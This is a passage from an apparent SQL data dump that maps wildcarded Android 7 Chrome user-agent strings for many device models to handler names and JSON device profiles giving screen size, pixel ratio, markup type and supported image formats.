Android 7.*; WAS-LX2J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WAS-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WAS-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WC300SN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WIM Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; WP5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; W_K600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wieppo S6 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wieppo S6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wileyfox Spark +) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wileyfox Spark X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wileyfox Spark) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wileyfox Storm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wileyfox Swift) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wizard_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wooze_L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Wooze_XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-TIGI_V13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-TIGI_V18) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-TIGI_V21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-TIGI_V3+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-TREME PQ39) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-TREME PQ52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-Treme_PQ51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-tremePQ35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-treme_PQ24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X-treme_PQ28) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X1030X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X18) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X1S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X2 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X20L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X3_Soul_Style) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X4UPlus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X4_Soul_Infinity_L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X4_Soul_Infinity_N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X4_Soul_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X4_Soul_Xtreme) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X53) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X60L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X9 Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X96mini) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"desktop\",\"markup\":\"tv\",\"screenWidth\":1280,\"screenHeight\":720,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XL150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XP8800) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XPLAY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1562) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1565) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1572) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1575) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1585) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1609) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1635-01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1635-02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1663) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1710-02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XT1799-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; XTOUCH X10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X_TIGI_A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X_treme_PQ34) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; X_treme_PQ52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; YU5040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; You L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Young Y56) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z1 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z255) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z3001S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z557BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z558VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Z60) AppleWebKit/* (KHTML, like Gecko) 